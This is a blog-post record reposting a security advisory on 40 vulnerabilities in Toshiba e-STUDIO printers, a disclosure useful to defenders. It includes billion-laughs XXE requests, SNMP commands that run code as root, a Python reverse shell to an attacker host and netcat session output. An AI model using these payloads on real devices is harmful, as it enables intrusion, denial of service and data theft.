{"id":57884,"date":"2024-07-04T19:30:20","date_gmt":"2024-07-04T16:30:20","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/179367\/2024-toshiba-mfp.txt"},"modified":"2024-07-04T19:30:20","modified_gmt":"2024-07-04T16:30:20","slug":"toshiba-multi-function-printers-40-vulnerabilities","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/toshiba-multi-function-printers-40-vulnerabilities\/","title":{"rendered":"Toshiba Multi-Function Printers 40 Vulnerabilities"},"content":{"rendered":"<p>Hello,<\/p>\n<p>Please find a text-only version below sent to security mailing lists.<\/p>\n<p>The complete version on &#8220;40 vulnerabilities in Toshiba Multi-Function<br \/>Printers&#8221; is posted here:<br \/>https:\/\/pierrekim.github.io\/blog\/2024-06-27-toshiba-mfp-40-vulnerabilities.html<\/p>\n<p>The text version is also posted here:<br \/>https:\/\/pierrekim.github.io\/advisories\/2024-toshiba-mfp.txt<\/p>\n<p>=== text-version of the advisory ===<\/p>\n<p>&#8212;&#8211;BEGIN PGP SIGNED MESSAGE&#8212;&#8211;<br \/>Hash: SHA512<\/p>\n<p>## Advisory Information<\/p>\n<p>Title: 40 vulnerabilities in Toshiba Multi-Function Printers<br \/>Advisory URL: https:\/\/pierrekim.github.io\/advisories\/2024-toshiba-mfp.txt<br \/>Blog URL: https:\/\/pierrekim.github.io\/blog\/2024-06-27-toshiba-mfp-40-vulnerabilities.html<br \/>Date published: 2024-06-27<br \/>Vendors contacted: Toshiba<br \/>Release mode: Released<br \/>CVE: CVE-2024-27141, CVE-2024-27142, CVE-2024-27143, CVE-2024-27144,<br \/>CVE-2024-27145, CVE-2024-27146, CVE-2024-27147, CVE-2024-27148,<br \/>CVE-2024-27149, CVE-2024-27150, CVE-2024-27151, CVE-2024-27152,<br \/>CVE-2024-27153, CVE-2024-27154, CVE-2024-27155, CVE-2024-27156,<br \/>CVE-2024-27157, CVE-2024-27158, CVE-2024-27159, CVE-2024-27160,<br \/>CVE-2024-27161, CVE-2024-27162, CVE-2024-27163, CVE-2024-27164,<br \/>CVE-2024-27165, CVE-2024-27166, CVE-2024-27167, CVE-2024-27168,<br \/>CVE-2024-27169, CVE-2024-27170, CVE-2024-27171, CVE-2024-27172,<br \/>CVE-2024-27173, CVE-2024-27174, CVE-2024-27175, CVE-2024-27176,<br \/>CVE-2024-27177, CVE-2024-27178, CVE-2024-27179, CVE-2024-27180<\/p>\n<p>## Product description<\/p>\n<p>&gt; e-STUDIO Multi-Function Printers (MFPs) are fast and productive, providing businesses and organisations the capability to produce what you need, when you need it.<br \/>&gt;<br \/>&gt; From https:\/\/www.toshibatec.co.uk\/workplace-solutions\/products-and-solutions\/mfps-and-printers\/<\/p>\n<p>## Vulnerability Summary<\/p>\n<p>Vulnerable versions: 103 different models of Toshiba Multi-Function<br \/>Printers (MFP) are vulnerable. It is recommended to visit the official<br \/>Toshiba advisory<br \/>(https:\/\/www.toshibatec.com\/information\/20240531_01.html), review the<br \/>list of affected printers<br \/>(https:\/\/www.toshibatec.com\/information\/pdf\/information20240531_01.pdf)<br \/>and apply security patches and replace unsupported MFP models.<\/p>\n<p>The summary of the vulnerabilities is as follows:<\/p>\n<p>1. CVE-2024-27141 &#8211; Pre-authenticated Blind XML External Entity (XXE)<br \/>injection &#8211; DoS<br \/>2. CVE-2024-27142 &#8211; Pre-authenticated XXE injection<br \/>3. CVE-2024-27143 &#8211; Pre-authenticated Remote Code Execution as root<br \/>4. CVE-2024-27144 &#8211; Pre-authenticated Remote Code Execution as root or<br \/>apache and multiple Local Privilege Escalations<br \/>4.1. Remote Code Execution &#8211; Upload of a new .py module inside WSGI<br \/>Python programs<br \/>4.2. Remote Code Execution &#8211; Upload of a new .ini configuration files<br \/>inside WSGI Python programs<br \/>4.3. Remote Code Execution &#8211; Upload of a malicious script<br \/>`\/tmp\/backtraceScript.sh` and injection of malicious gdb commands<br \/>4.4. Remote Code Execution &#8211; Upload of a malicious<br \/>`\/home\/SYSROM_SRC\/build\/common\/bin\/sapphost.py` program<br \/>4.5. Remote Code Execution &#8211; Upload of malicious libraries<br \/>4.6. Other ways to get Remote Code Execution<br \/>5. CVE-2024-27145 &#8211; Multiple Post-authenticated Remote Code Executions as root<br \/>6. CVE-2024-27146 &#8211; Lack of privileges separation<br \/>7. CVE-2024-27147 &#8211; Local Privilege Escalation and Remote Code<br \/>Execution using snmpd<br \/>8. CVE-2024-27148 &#8211; Local Privilege Escalation and Remote Code<br \/>Execution using insecure PATH<br \/>9. CVE-2024-27149 &#8211; Local Privilege Escalation and Remote Code<br \/>Execution using insecure LD_PRELOAD<br \/>10. CVE-2024-27150 &#8211; Local Privilege Escalation and Remote Code<br \/>Execution using insecure LD_LIBRARY_PATH<br \/>11. CVE-2024-27151 &#8211; Local Privilege Escalation and Remote Code<br \/>Execution using insecure permissions for 106 programs<br \/>11.1. 3 vulnerable programs not running as root<br \/>11.2. 103 vulnerable programs running as root<br \/>12. CVE-2024-27152 &#8211; Local Privilege Escalation and Remote Code<br \/>Execution using insecure permissions for libraries<br \/>12.1. Example with `\/home\/SYSROM_SRC\/bin\/syscallerr`<br \/>13. CVE-2024-27153 &#8211; Local Privilege Escalation and Remote Code<br \/>Execution using CISSM<br \/>14. CVE-2024-27154 and CVE-2024-27155 &#8211; Passwords stored in clear-text<br \/>logs and insecure logs<br \/>14.1. Clear-text password written in logs when an user logs into the printer<br \/>14.2. Clear-text password written in logs when a password is modified<br \/>15. CVE-2024-27156 &#8211; Leak of authentication sessions in insecure logs<br \/>in \/ramdisk\/work\/log directory<br \/>16. CVE-2024-27157 &#8211; Leak of authentication sessions in insecure logs<br \/>in \/ramdisk\/al\/network\/log directory<br \/>17. CVE-2024-27158 &#8211; Hardcoded root password<br \/>18. CVE-2024-27159 &#8211; Hardcoded password used to encrypt logs<br \/>19. CVE-2024-27160 &#8211; Hardcoded password used to encrypt logs and use<br \/>of a weak digest cipher<br \/>20. CVE-2024-27161 &#8211; Hardcoded password used to encrypt files<br \/>21. CVE-2024-27162 &#8211; DOM-based XSS present in the \/js\/TopAccessUtil.js file<br \/>22. CVE-2024-27163 &#8211; Leak of admin password and passwords<br \/>23. CVE-2024-27164 &#8211; Hardcoded credentials in telnetd<br \/>24. CVE-2024-27165 &#8211; Local Privilege Escalation using PROCSUID<br \/>25. CVE-2024-27166 &#8211; Insecure permissions for core files<br \/>26. CVE-2024-27167 &#8211; Insecure permissions used for Sendmail &#8211; Local<br \/>Privilege Escalation<br \/>27. CVE-2024-27168 &#8211; Hardcoded keys found in Python applications used<br \/>to generate authentication cookies<br \/>28. CVE-2024-27169 &#8211; Lack of authentication in WebPanel &#8211; Local<br \/>Privilege Escalation<br \/>29. CVE-2024-27170 &#8211; Hardcoded credentials for WebDAV access<br \/>30. CVE-2024-27171 &#8211; Insecure permissions<br \/>31. CVE-2024-27172 &#8211; Remote Code Execution &#8211; command injection as root<br \/>32. CVE-2024-27173 &#8211; Remote Code Execution &#8211; insecure upload<br \/>33. CVE-2024-27174 &#8211; Remote Code Execution &#8211; insecure upload<br \/>34. CVE-2024-27175 &#8211; Local File Inclusion<br \/>35. CVE-2024-27176 &#8211; Remote Code Execution &#8211; insecure upload<br \/>36. CVE-2024-27177 &#8211; Remote Code Execution &#8211; insecure upload<br \/>37. CVE-2024-27178 &#8211; Remote Code Execution &#8211; insecure copy<br \/>38. CVE-2024-27179 &#8211; Session disclosure inside the log files in the<br \/>installation of applications<br \/>39. CVE-2024-27180 &#8211; TOCTOU vulnerability in the installation of<br \/>applications, allowing to install rogue applications and get RCE<\/p>\n<p>CVE-2024-27171 to CVE-2024-27180 affect the implementation of<br \/>third-party application system and third-party applications installed<br \/>by default in Toshiba printers &#8211; this is an extremely interesting<br \/>attack surface for persistence.<\/p>\n<p>TL;DR: An attacker can compromise Toshiba Multi-Function Printers<br \/>using multiple vulnerabilities.<\/p>\n<p>List of vulnerable models of Toshiba Multi-Function Printers (103 models):<\/p>\n<p>2021AC, 2521AC, 2020AC, 2520AC, 2025NC, 2525AC, 3025AC, 3525AC,<br \/>3525ACG, 4525AC, 4525ACG, 5525AC, 5525ACG,<br \/>6525AC, 6525ACG, 2528A, 3028A, 3528A, 3528AG, 4528A, 4528AG,<br \/>5528A, 6528A, 6526AC, 6527AC, 7527AC, 6529A,<br \/>7529A, 9029A, 330AC, 400AC, 2010AC, 2110AC, 2510AC, 2610AC,<br \/>2015NC, 2515AC, 2615AC, 3015AC, 3115AC, 3515AC,<br \/>3615AC, 4515AC, 4615AC, 5015AC, 5115AC, 2018A, 2518A, 2618A,<br \/>3018A, 3118A, 3018AG, 3518A, 3518AG, 3618A,<br \/>3618AG, 4518A, 4518AG, 4618A, 4618AG, 5018A, 5118A, 5516AC,<br \/>5616AC, 6516AC, 6616AC, 7516AC, 7616AC, 5518A,<br \/>5618A, 6518A, 6618A, 7518A, 7618A, 8518A, 8618A, 2000AC, 2500AC,<br \/>2005NC, 2505AC, 3005AC, 3505AC, 4505AC,<br \/>5005AC, 2008A, 2508A, 3008A, 3008AG, 3508A, 3508AG, 4508A, 4508AG,<br \/>5008A, 5506AC, 6506AC, 7506AC, 5508A,<br \/>6508A, 7508A, 8508A, 3508LP, 4508LP, 5008LP.<\/p>\n<p>_Miscellaneous notes_:<\/p>\n<p>This security assessment was entirely done using a blackbox approach<br \/>and fully-remote &#8211; I only had some IPs of printers (no physical access<br \/>and no credentials for admin or normal users). Consequently, the<br \/>physical security of the printers was not analyzed and the<br \/>vulnerabilities were confirmed with different models running the<br \/>latest firmware versions (e-STUDIO2010AC, e-STUDIO3005AC,<br \/>e-STUDIO3508A and e-STUDIO5018A).<\/p>\n<p>The vulnerabilities were communicated to Toshiba on June 14, 2023 and<br \/>communications with Toshiba were very effective.<\/p>\n<p>_Impacts_<\/p>\n<p>An attacker can compromise Toshiba multi-function printers (MFP) and<br \/>execute code. These printers are running Linux and are powerful. They<br \/>are ideal to host implants (and fun programs, like Bettercap) and move<br \/>laterally inside infrastructures.<\/p>\n<p>_Recommendations_<\/p>\n<p>&#8211; &#8211; Use network segmentation to isolate MFPs.<br \/>&#8211; &#8211; Apply security patches.<br \/>&#8211; &#8211; Replace unsupported MFPs.<\/p>\n<p>## Details &#8211; Pre-authenticated Blind XML External Entity (XXE) injection &#8211; DoS<\/p>\n<p>The Toshiba printers use XML communication for the `\/contentwebserver`<br \/>API endpoint provided by the printer.<\/p>\n<p>This endpoint is managed by an Apache module located inside the<br \/>`mod_contentwebserver.so` library. This library provides XML parsing<br \/>and is vulnerable to a time-based blind XML External Entity (XXE)<br \/>vulnerability.<\/p>\n<p>Using a Billion-laugh attack, we can confirm there is a time-based<br \/>blind XXE vulnerability. When sending only 1 entity (&amp;lol1) that is<br \/>defined inside the lolz root element, this &amp;lol1 entity is expanding<br \/>into 10 entities and the request takes 200ms.<\/p>\n<p>With an entity that is expanding into:<\/p>\n<p>&#8211; &#8211; 10^10 entities, the request takes 206ms;<br \/>&#8211; &#8211; 10^10^10 entities, the request takes 541ms;<br \/>&#8211; &#8211; 10^10^10^10 entities, the request takes 2.7s;<br \/>&#8211; &#8211; 10^10^10^10^2 entities, the request takes 8.8s;<br \/>&#8211; &#8211; 10^10^10^10^2 entities, the request takes 30.9s;<\/p>\n<p>Even if the Apache server displays `MODULE_ERROR:SendRequest failed`,<br \/>the XML has been successfully evaluated by the<br \/>`mod_contentwebserver.so` library running in the remote printer.<\/p>\n<p>The payload is:<\/p>\n<p>POST \/contentwebserver HTTP\/1.1<br \/>Host: 10.0.0.1:8080<br \/>User-Agent: Mozilla\/5.0 (X11; Linux x86_64; rv:102.0)<br \/>Gecko\/20100101 Firefox\/102.0<br \/>Accept: *\/*<br \/>Accept-Language: en-US,en;q=0.5<br \/>Accept-Encoding: gzip, deflate<br \/>Cache-Control: no-cache<br \/>Pragma: no-cache<br \/>Content-Type: text\/plain; charset=utf-8<br \/>csrfpId: 10.0.0.2.852d519a6fa9825fae857bac5c003da0<br \/>Content-Length: 759<br \/>Origin: http:\/\/10.0.0.1:8080<br \/>Connection: close<br \/>Referer: http:\/\/10.0.0.1:8080\/?MAIN=TOPACCESS<br \/>Cookie: Session=10.0.0.2.852d519a6fa9825fae857bac5c003da0;<br \/>Locale=en-US,en#q=0.5; BrowserLang=en_US; pageTrack=MAIN%3DLOGS;<br \/>IgnoreSessionTimeout=1<\/p>\n<p>&lt;!DOCTYPE lolz [<br \/>&lt;!ENTITY lol &#8220;lol&#8221;&gt;<br \/>&lt;!ELEMENT lolz (#PCDATA)&gt;<br \/>&lt;!ENTITY lol1 &#8220;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&#8221;&gt;<br \/>&lt;!ENTITY lol2<br \/>&#8220;&amp;lol1;&amp;lol1;&amp;lol1;&amp;lol1;&amp;lol1;&amp;lol1;&amp;lol1;&amp;lol1;&amp;lol1;&amp;lol1;&#8221;&gt;<br \/>&lt;!ENTITY lol3<br \/>&#8220;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&#8221;&gt;<br \/>&lt;!ENTITY lol4<br \/>&#8220;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&#8221;&gt;<br \/>&lt;!ENTITY lol5 &#8220;&amp;lol4;&amp;lol4;&amp;lol4;&#8221;&gt;<br \/>&lt;!ENTITY lol6<br \/>&#8220;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&#8221;&gt;<br \/>&lt;!ENTITY lol7<br \/>&#8220;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&#8221;&gt;<br \/>&lt;!ENTITY lol8<br \/>&#8220;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&#8221;&gt;<br \/>&lt;!ENTITY lol9<br \/>&#8220;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;&#8221;&gt;<br \/>]&gt;<br \/>&lt;lolz&gt;&amp;lol5;&lt;\/lolz&gt;<\/p>\n<p>Using this HTTP request inside Burp (with a correct session while<br \/>browsing the printer without authentication), we can modify the entity<br \/>on the last line; we can see that the XML has been parsed by comparing<br \/>the time required for the printer to analyze the request.<\/p>\n<p>The time will appear inside Burp on the bottom-right of the Window (in<br \/>red in the following screenshots):<\/p>\n[please use the HTML version at<br \/>https:\/\/pierrekim.github.io\/blog\/2024-06-27-toshiba-mfp-40-vulnerabilities.html]\n[please use the HTML version at<br \/>https:\/\/pierrekim.github.io\/blog\/2024-06-27-toshiba-mfp-40-vulnerabilities.html]\n<p>With 10^10^10^10^4 entity, then request takes 30 seconds.<\/p>\n<p>HTTP requests containing more XML complexity (with a lot of XML<br \/>entities to be parsed) will DoS the printer and the CPU of the printer<br \/>will run at 100%.<\/p>\n<p>The XML parser is vulnerable to XXE, without authentication.<\/p>\n<p>Exfiltration of file over HTTP, FTP and gopher was not obtained as<br \/>some protections seem to be implemented in the XML parser.<\/p>\n<p>## Details &#8211; Pre-authenticated XXE injection<\/p>\n<p>The Toshiba printers use XML communication for the `\/contentwebserver`<br \/>API endpoint provided by the printer.<\/p>\n<p>This endpoint is managed by an Apache module located inside the<br \/>`mod_contentwebserver.so` library. This library provides XML parsing<br \/>and is vulnerable to a XML External Entity (XXE) vulnerability.<\/p>\n<p>Using a Billion-laugh attack and correctly formatted data for the<br \/>printer (with the Toshiba-specific non-public DTD, the tags will be<br \/>interpreted by the remote printer), we can confirm the presence of a<br \/>XXE vulnerability. The resulting evaluated XML will be displayed by<br \/>the printer:<\/p>\n[please use the HTML version at<br \/>https:\/\/pierrekim.github.io\/blog\/2024-06-27-toshiba-mfp-40-vulnerabilities.html]\n[please use the HTML version at<br \/>https:\/\/pierrekim.github.io\/blog\/2024-06-27-toshiba-mfp-40-vulnerabilities.html]\n<p>The malicious payload is (containing a `&lt;X&gt;&amp;lol4;&lt;\/X&gt;`):<\/p>\n<p>POST \/contentwebserver HTTP\/1.1<br \/>Host: 10.0.0.1:8080<br \/>User-Agent: Mozilla\/5.0 (X11; Linux x86_64; rv:102.0)<br \/>Gecko\/20100101 Firefox\/102.0<br \/>Accept: *\/*<br \/>Accept-Language: en-US,en;q=0.5<br \/>Accept-Encoding: gzip, deflate<br \/>Cache-Control: no-cache<br \/>Pragma: no-cache<br \/>Content-Type: text\/plain; charset=utf-8<br \/>csrfpId: 10.0.0.2.5d5255447c6eb69fc84a2d8c2056eb7d<br \/>Content-Length: 1226<br \/>Origin: http:\/\/10.0.0.1:8080<br \/>Connection: close<br \/>Referer: http:\/\/10.0.0.1:8080\/Administration\/CreateNewPwd.html<br \/>Cookie: Locale=en-US,en#q=0.5; BrowserLang=en_US;<br \/>pageTrack=MAIN%3DDEVICE; IgnoreSessionTimeout=1; clicked=0;<br \/>addrLastVisited=ADDRBK;<br \/>Session=10.0.0.2.5d5255447c6eb69fc84a2d8c2056eb7d;<br \/>PREF=%7BList%2C8%2CClip<br \/>boardForPage-%7D; PROGSTAT=0<\/p>\n<p>&lt;!DOCTYPE lolz [<br \/>&lt;!ENTITY lol &#8220;lol&#8221;&gt;<br \/>&lt;!ELEMENT lolz (#PCDATA)&gt;<br \/>&lt;!ENTITY lol1 &#8220;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&#8221;&gt;<br \/>&lt;!ENTITY lol2<br \/>&#8220;&amp;lol1;&amp;lol1;&amp;lol1;&amp;lol1;&amp;lol1;&amp;lol1;&amp;lol1;&amp;lol1;&amp;lol1;&amp;lol1;&#8221;&gt;<br \/>&lt;!ENTITY lol3<br \/>&#8220;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&#8221;&gt;<br \/>&lt;!ENTITY lol4<br \/>&#8220;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&#8221;&gt;<br \/>&lt;!ENTITY lol5 &#8220;&amp;lol4;&amp;lol4;&amp;lol4;&#8221;&gt;<br \/>&lt;!ENTITY lol6<br \/>&#8220;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&#8221;&gt;<br \/>&lt;!ENTITY lol7<br \/>&#8220;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&#8221;&gt;<br \/>&lt;!ENTITY lol8<br \/>&#8220;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&#8221;&gt;<br \/>&lt;!ENTITY lol9<br \/>&#8220;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;&#8221;&gt;<br \/>]&gt;<br \/>&lt;?xml version=&#8221;1.0&#8243;?&gt;<br \/>&lt;DeviceInformationModel&gt;<br \/>&lt;GetValue&gt;<br \/>&lt;UserManager&gt;<br \/>&lt;View&gt;<br \/>&lt;Users\/&gt;<br \/>&lt;\/View&gt;<br \/>&lt;\/UserManager&gt;<br \/>&lt;\/GetValue&gt;<br \/>&lt;SetValue&gt;<br \/>&lt;UserManager&gt;<br \/>&lt;View&gt;<br \/>&lt;Users&gt;<br \/>&lt;User&gt;<br \/>&lt;Information&gt;<br \/>&lt;X&gt;&amp;lol4;&lt;\/X&gt;<br \/>&lt;\/Information&gt;<br \/>&lt;\/User&gt;<br \/>&lt;\/Users&gt;<br \/>&lt;\/View&gt;<br \/>&lt;\/UserManager&gt;<br \/>&lt;\/SetValue&gt;<br \/>&lt;Command&gt;<br \/>&lt;ForgotPassword&gt;<br \/>&lt;commandNode&gt;UserManager\/Users&lt;\/commandNode&gt;<br \/>&lt;Params&gt;<br \/>&lt;userDetails<br \/>contentType=&#8221;XPath&#8221;&gt;UserManager\/View\/Users\/User&lt;\/userDetails&gt;<br \/>&lt;cmdDetails commandType=&#8221;Reset&#8221;\/&gt;<br \/>&lt;\/Params&gt;<br \/>&lt;\/ForgotPassword&gt;<br \/>&lt;\/Command&gt;<br \/>&lt;\/DeviceInformationModel&gt;<\/p>\n<p>And the response will be:<\/p>\n<p>HTTP\/1.1 200 OK<br \/>Date: Wed, 27 May 2023 10:54:12 GMT<br \/>Server: Apache<br \/>X-Frame-Options: SAMEORIGIN<br \/>Cache-Control: max-age=63072000<br \/>Accept-Language: en-US,en;q=0.5<br \/>Connection: close<br \/>Content-Type: text\/xml<br \/>Content-Length: 30465<\/p>\n<p>&lt;?xml version=&#8221;1.0&#8243;?&gt;<br \/>&lt;DeviceInformationModel&gt;<br \/>&lt;GetValue&gt;<br \/>&lt;UserManager&gt;<br \/>&lt;View&gt;<br \/>&lt;Users&gt;<br \/>&lt;User&gt;<br \/>&lt;Information&gt;<\/p>\n<p>&lt;X&gt;lollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollol[&#8230;]lollollollollol&lt;\/X&gt;<br \/>&lt;\/Information&gt;<br \/>&lt;\/User&gt;<br \/>&lt;\/Users&gt;<br \/>&lt;\/View&gt;<br \/>&lt;\/UserManager&gt;<br \/>&lt;\/GetValue&gt;<br \/>&lt;Command&gt;<br \/>&lt;ForgotPassword&gt;<br \/>&lt;commandNode&gt;UserManager\/Users&lt;\/commandNode&gt;<br \/>&lt;Params&gt;<br \/>&lt;userDetails<br \/>contentType=&#8221;XPath&#8221;&gt;UserManager\/View\/Users\/User&lt;\/userDetails&gt;<br \/>&lt;cmdDetails commandType=&#8221;Reset&#8221;\/&gt;<br \/>&lt;\/Params&gt;<br \/>&lt;Response&gt;<br \/>&lt;statusOfOperation&gt;STATUS_FAILED&lt;\/statusOfOperation&gt;<br \/>&lt;\/Response&gt;<br \/>&lt;\/ForgotPassword&gt;<br \/>&lt;\/Command&gt;<br \/>&lt;\/DeviceInformationModel&gt;<br \/>kali%<\/p>\n<p>The XML parser is vulnerable to XXE, without authentication.<\/p>\n<p>An attacker can exploit the XXE to retrieve information.<\/p>\n<p>Exploitability was not analyzed in depth since a RCE was found at the<br \/>same time: Pre-authenticated Remote Code Execution as root.<\/p>\n<p>## Details &#8211; Pre-authenticated Remote Code Execution as root<\/p>\n<p>It was observed that the Toshiba printers use SNMP for configuration.<\/p>\n<p>By default, these communities are used:<\/p>\n<p>&#8211; &#8211; `public` for read only access;<br \/>&#8211; &#8211; `private` for read\/write access.<\/p>\n<p>Using the `private` community, it is possible to remotely execute<br \/>commands as root on the remote printer.<\/p>\n<p>For example, these commands will execute the command `id` as root on<br \/>the remote printer:<\/p>\n<p>kali% snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private [ip]&#8216;nsExtendStatus.&#8221;cmd&#8221;&#8216; = createAndGo &#8216;nsExtendCommand.&#8221;cmd&#8221;&#8216; = \/bin\/sh<br \/>&#8216;nsExtendArgs.&#8221;cmd&#8221;&#8216; = &#8216;-c id&#8217;<br \/>NET-SNMP-EXTEND-MIB::nsExtendStatus.&#8221;cmd&#8221; = INTEGER: createAndGo(4)<br \/>NET-SNMP-EXTEND-MIB::nsExtendCommand.&#8221;cmd&#8221; = STRING: \/bin\/sh<br \/>NET-SNMP-EXTEND-MIB::nsExtendArgs.&#8221;cmd&#8221; = STRING: -c id<\/p>\n<p>kali% snmpbulkwalk -c private -v2c [ip] NET-SNMP-EXTEND-MIB::nsExtendObjects<br \/>NET-SNMP-EXTEND-MIB::nsExtendNumEntries.0 = INTEGER: 6<br \/>NET-SNMP-EXTEND-MIB::nsExtendCommand.&#8221;cmd&#8221; = STRING: \/bin\/sh<br \/>NET-SNMP-EXTEND-MIB::nsExtendArgs.&#8221;cmd&#8221; = STRING: -c id<br \/>NET-SNMP-EXTEND-MIB::nsExtendInput.&#8221;cmd&#8221; = STRING:<br \/>NET-SNMP-EXTEND-MIB::nsExtendCacheTime.&#8221;cmd&#8221; = INTEGER: 5<br \/>NET-SNMP-EXTEND-MIB::nsExtendExecType.&#8221;cmd&#8221; = INTEGER: exec(1)<br \/>NET-SNMP-EXTEND-MIB::nsExtendRunType.&#8221;cmd&#8221; = INTEGER: run-on-read(1)<br \/>NET-SNMP-EXTEND-MIB::nsExtendStorage.&#8221;cmd&#8221; = INTEGER: volatile(2)<br \/>NET-SNMP-EXTEND-MIB::nsExtendStatus.&#8221;cmd&#8221; = INTEGER: active(1)<br \/>NET-SNMP-EXTEND-MIB::nsExtendOutput1Line.&#8221;cmd&#8221; = STRING:<br \/>uid=0(root) gid=2000(trusted) groups=0(root)<br \/>NET-SNMP-EXTEND-MIB::nsExtendOutputFull.&#8221;cmd&#8221; = STRING:<br \/>uid=0(root) gid=2000(trusted) groups=0(root)<br \/>NET-SNMP-EXTEND-MIB::nsExtendOutNumLines.&#8221;cmd&#8221; = INTEGER: 1<br \/>NET-SNMP-EXTEND-MIB::nsExtendResult.&#8221;cmd&#8221; = INTEGER: 0<br \/>NET-SNMP-EXTEND-MIB::nsExtendOutLine.&#8221;cmd&#8221;.1 = STRING: uid=0(root)<br \/>gid=2000(trusted) groups=0(root)<\/p>\n<p>Using this vulnerability will allow any attacker to get a root access<br \/>on a remote Toshiba printer as shown below.<\/p>\n<p>This following PoC will execute a connect-back shell with root<br \/>privilege to 10.0.0.2:21\/tcp:<\/p>\n<p>kali% snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private [ip]&#8216;nsExtendStatus.&#8221;cmd&#8221;&#8216; = createAndGo &#8216;nsExtendCommand.&#8221;cmd&#8221;&#8216; =<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/python &#8216;nsExtendArgs.&#8221;cmd&#8221;&#8216; = &#8216;-c<br \/>&#8220;import sys,socket,os,pty;s=socket.socket();s.connect((\\&#8221;10.0.0.2\\&#8221;,21));[os.dup2(s.fileno(),fd)<br \/>for fd in (0,1,2)];pty.spawn(\\&#8221;\/bin\/sh\\&#8221;)&#8221;&#8216;<br \/>NET-SNMP-EXTEND-MIB::nsExtendStatus.&#8221;cmd&#8221; = INTEGER: createAndGo(4)<br \/>NET-SNMP-EXTEND-MIB::nsExtendCommand.&#8221;cmd&#8221; = STRING:<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/python<br \/>NET-SNMP-EXTEND-MIB::nsExtendArgs.&#8221;cmd&#8221; = STRING: -c &#8220;import<br \/>sys,socket,os,pty;s=socket.socket();s.connect((\\&#8221;10.0.0.2\\&#8221;,21));[os.dup2(s.fileno(),fd)<br \/>for fd in (0,1,2)];pty.spawn(\\&#8221;\/bin\/sh\\&#8221;)&#8221;<br \/>kali% snmpbulkwalk -c private -v2c [ip] NET-SNMP-EXTEND-MIB::nsExtendObjects<\/p>\n<p>And on the attacker machine, we will receive a shell on port 21\/tcp:<\/p>\n<p>kali# nc -l -v -p 21<br \/>listening on [any] 21 &#8230;<br \/>10.0.0.1: inverse host lookup failed: Unknown host<br \/>connect to [10.0.0.2] from (UNKNOWN) [10.0.0.1] 43467<br \/>sh-4.1# uname -ap<br \/>Linux MFP12188257 3.10.38-ltsi-WR6.0.0.11_standard #3010 SMP Wed<br \/>Jul 6 16:20:23 IST 2022 i686 GNU\/Linux<br \/>sh-4.1# id<br \/>uid=0(root) gid=2000(trusted) groups=0(root)<br \/>sh-4.1# exit<\/p>\n<p>The attacker will then get a full root access in the printer,<br \/>including full access to the encrypted partition:<\/p>\n<p>kali# nc -l -v -p 443<br \/>listening on [any] 443 &#8230;<br \/>10.0.0.1: inverse host lookup failed: Unknown host<br \/>connect to [10.0.0.2] from (UNKNOWN) [10.0.0.1] 36468<br \/>bash-4.1# df -h<br \/>df -h<br \/>Filesystem Size Used Avail Use% Mounted on<br \/>rootfs 4.8G 3.7G 904M 81% \/<br \/>\/dev\/root 48M 28M 18M 62% \/old_root<br \/>\/dev\/sda2 4.8G 3.7G 904M 81% \/<br \/>\/dev\/sda13 4.8G 49M 4.5G 2% \/platform<br \/>none 1.5G 188K 1.5G 1% \/dev<br \/>\/dev\/sda3 4.8G 1.3G 3.4G 28% \/rollback<br \/>\/dev\/sda5 25G 904M 23G 4% \/work<br \/>\/dev\/sda6 2.9G 620M 2.2G 23% \/registration<br \/>\/dev\/sda7 976M 1.3M 908M 1% \/backup<br \/>\/dev\/sda8 32G 60M 30G 1% \/imagedata<br \/>\/dev\/sda9 94G 65M 89G 1% \/application<br \/>\/dev\/mapper\/enc_encryption<br \/>992M 2.6M 964M 1% \/encryption<br \/>\/dev\/sda12 119G 60M 112G 1% \/storage<br \/>tmpfs 1.5G 3.7M 1.5G 1% \/dev\/shm<br \/>bash-4.1# mount<br \/>mount<br \/>rootfs on \/ type rootfs (rw)<br \/>\/dev\/root on \/old_root type ext2 